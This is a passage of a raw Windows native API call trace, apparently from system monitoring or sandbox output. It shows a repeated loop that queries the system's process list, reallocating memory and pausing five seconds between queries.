Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.490] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.509] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.524] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.539] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.555] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.569] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.585] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.601] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.618] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.632] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.648] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.679] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.695] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.710] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.726] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.741] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.758] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.772] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.787] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.803] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.815] 